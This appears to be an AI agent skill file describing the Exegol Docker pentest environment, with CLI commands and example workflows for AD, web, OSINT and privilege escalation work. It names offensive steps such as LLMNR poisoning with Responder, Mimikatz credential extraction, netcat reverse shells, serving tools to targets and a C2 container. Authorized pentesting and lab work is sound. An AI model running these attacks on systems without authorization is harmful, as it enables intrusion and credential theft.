--- name: exegol-pentest description: Use when setting up or managing pentest environments with Exegol, launching offensive security containers, configuring VPN/network for engagements, or when the user mentions Exegol, pentest lab, HTB, CTF environment setup --- # Exegol for Offensive Security ## Overview Exegol is a Docker-based pentest environment with 100+ pre-installed offensive tools, managed via a Python CLI wrapper. It replaces traditional Kali VMs with fast, reproducible, disposable containers. **Core concept:** `exegol start ` creates a ready-to-hack container in seconds. All tools, resources, and configurations are pre-loaded. For the complete CLI reference, images list, and resource catalog, see `exegol-reference.md` in this skill directory. ## When to Use - User needs to set up a pentest/red team environment - User wants to launch tools available in Exegol (BloodHound, Burp, Responder, CrackMapExec, etc.) - User is doing HTB, CTF, or lab work and needs a quick environment - User asks about container-based offensive security setups - User needs to manage multiple engagement environments simultaneously **When NOT to use:** For defensive/blue team tooling, forensics-only workflows, or general Docker questions unrelated to security testing. ## Quick Reference | Task | Command | |------|---------| | Start interactive container | `exegol start mypentest full` | | Start with workspace | `exegol start client1 full -w ./engagement/` | | Start with current dir | `exegol start client1 full -cwd` | | Start with VPN | `exegol start htb full --vpn ~/vpn/lab.ovpn` | | Start with logging | `exegol start client1 full -l -w ./engagement/` | | Run single command | `exegol exec mypentest 'nmap -sV 10.10.10.1'` | | Run GUI tool in background | `exegol exec -b mypentest burpsuite` | | Temp container for one-off | `exegol exec --tmp full 'whatweb http://target'` | | List containers/images | `exegol info` | | Stop container | `exegol stop mypentest` | | Remove container | `exegol remove mypentest` | | Install an image | `exegol install full` | | Update everything | `exegol update` | ## Engagement Setup Workflow ### 1. Choose the Right Image | Image | Use Case | |-------|----------| | `full` | General pentest, full toolkit (50GB+) | | `ad` | Active Directory / internal pentest | | `web` | Web application testing | | `light` | Quick recon, limited disk space | | `osint` | OSINT / reconnaissance only | | `free` | Same as `full` but community edition (delayed releases) | ### 2. Create the Engagement Container ```bash # Standard engagement setup with workspace and logging exegol start -w /path/to/engagement/ -l # Example: Internal AD pentest exegol start acme-internal ad -w ./acme-corp/ -l # Example: Web app pentest exegol start webapp-audit web -w ./webapp-audit/ -l # Example: HTB lab with VPN exegol start htb full --vpn ~/vpn/htb-lab.ovpn -w ./htb/ ``` ### 3. Network Configuration | Scenario | Config | |----------|--------| | Host network (default) | No flag needed, shares host interfaces | | VPN to target network | `--vpn ~/path/to/config.ovpn` | | VPN with credentials | `--vpn config.ovpn --vpn-auth creds.txt` | | Isolated container | `--network disable` | | Container-to-container | `--network docker` | | Port forwarding | `-p 8080:8080 -p 4444:4444` | ### 4. Privilege Options for Specific Attacks ```bash # WiFi / network sniffing (needs NET_ADMIN) exegol start wifi full --cap NET_ADMIN -d /dev/bus/usb/ # USB device access (Proxmark, Rubber Ducky, etc.) exegol start hw full -d /dev/ttyACM0 # Full privilege (use sparingly) exegol start lab full --privileged ``` ## Pentest Workflow Patterns ### AD / Internal Pentest ```bash # Create container with AD image exegol start internal ad -w ./client-engagement/ -l --vpn client-vpn.ovpn # Inside container: neo4j start # Start Neo4j for BloodHound bloodhound-ce # Launch BloodHound CE (port 1030) crackmapexec smb 10.0.0.0/24 # Network discovery responder -I eth0 # LLMNR/NBT-NS poisoning bloodhound-python -d domain.local -u user -p pass -c All # Collect AD data ``` **Default credentials inside container:** | Service | User | Password | |---------|------|----------| | Neo4j | `neo4j` | `exegol4thewin` | | BloodHound CE | via web UI | `exegol4thewin` | | Empire | `empireadmin` | `exegol4thewin` | ### Web Application Pentest ```bash # Create container with web image exegol start webapp web -w ./webapp-audit/ -l # Inside container: burpsuite # Launch Burp Suite (proxy on 8080) nuclei -u https://target.com # Automated vuln scanning sqlmap -u "http://target/page?id=1" # SQL injection testing ffuf -u http://target/FUZZ -w /opt/resources/... # Directory fuzzing ``` ### Recon / OSINT ```bash exegol start recon osint -w ./recon/ # Inside container: subfinder -d target.com # Subdomain enumeration httpx -l subdomains.txt # HTTP probing theHarvester -d target.com -b all # Email/domain harvesting ``` ### Privilege Escalation (Using Built-in Resources) Resources are available at `/opt/resources` inside every container: | Resource | Path | Purpose | |----------|------|---------| | LinPEAS | `/opt/resources/linux/linPEAS/` | Linux privesc enumeration | | WinPEAS | `/opt/resources/windows/winPEAS/` | Windows privesc enumeration | | Mimikatz | `/opt/resources/windows/mimikatz/` | Windows credential extraction | | Chisel | `/opt/resources/linux/chisel/` | TCP/UDP tunneling | | ligolo-ng | `/opt/resources/linux/ligolo-ng/` | Network pivoting | | SharpHound | `/opt/resources/windows/SharpHound/` | AD collection | | PrintSpoofer | `/opt/resources/windows/PrintSpoofer/` | Windows privesc | | GodPotato | `/opt/resources/windows/GodPotato/` | Windows privesc | | netcat (static) | `/opt/resources/linux/nc` | Reverse shells | ```bash # Serve resources to target via HTTP cd /opt/resources && python3 -m http.server 8888 # Or transfer specific tool python3 -m http.server -d /opt/resources/linux/linPEAS/ 8888 ``` ## Multi-Container Engagements Run parallel containers for different phases or targets: ```bash # Recon container exegol start recon-phase osint -w ./engagement/recon/ # Attack container with VPN exegol start attack full --vpn client.ovpn -w ./engagement/attack/ -l # C2 container exegol start c2 full -p 443:443 -p 80:80 -w ./engagement/c2/ -l ``` Switch between containers by spawning new shells: ```bash exegol start attack # Opens new shell in existing "attack" container ``` ## Credential Management (exegol-history) ```bash # Add credentials found during engagement exh add creds -u 'admin' -p 'P@ssw0rd!' -d 'ACME.LOCAL' exh add creds -u 'svc_sql' -H 'aad3b435b51404eeaad3b435b51404ee:...' -d 'ACME.LOCAL' # Set active credentials as environment variables exh set creds # Add discovered hosts exh add hosts --ip 10.10.10.1 -n dc01 -r "Domain Controller" exh add hosts --ip 10.10.10.5 -n web01 -r "IIS Web Server" # View current context exh show # Bulk import exh import creds --file found_creds.csv --format CSV ``` ## Logging & Evidence ```bash # Enable logging at container creation exegol start engagement full -l -w ./engagement/ # Logs are stored in /workspace/logs/ (asciinema format by default) # Replay a session: asciinema play /workspace/logs/session.cast ``` **Logging methods:** - `asciinema` (default) — records terminal sessions, replayable - `script` — raw terminal recording ## Customization (my-resources) Personal configs persist across all containers via `~/.exegol/my-resources/`: | Path | Purpose | |------|---------| | `bin/` | Custom tools (auto-added to `$PATH`) | | `setup/zsh/aliases` | Custom shell aliases | | `setup/zsh/history` | Custom command history | | `setup/python3/requirements.txt` | Python packages to auto-install | | `setup/apt/packages.list` | APT packages to auto-install | | `setup/bloodhound/customqueries_merge/` | BloodHound custom queries | | `setup/firefox/policies.json` | Firefox extensions, bookmarks | | `setup/load_user_setup.sh` | Custom setup script (runs on first start) | ## Common Mistakes | Mistake | Fix | |---------|-----| | Trying to modify container config after creation | Container options are set at creation only. Remove and recreate. | | Forgetting `-l` for logging | Always use `-l` on real engagements for evidence | | Using `--privileged` everywhere | Use specific `--cap` flags instead (e.g., `--cap NET_ADMIN`) | | Not setting workspace | Always use `-w` to persist data outside the container | | Running out of disk space | `full` image is 50GB+. Use `light` or `ad`/`web` for focused work | | VPN not working | VPN auto-switches to `docker` network mode. Check with `exegol info ` | | GUI apps not displaying | Ensure X11 is not disabled. On macOS, install XQuartz. |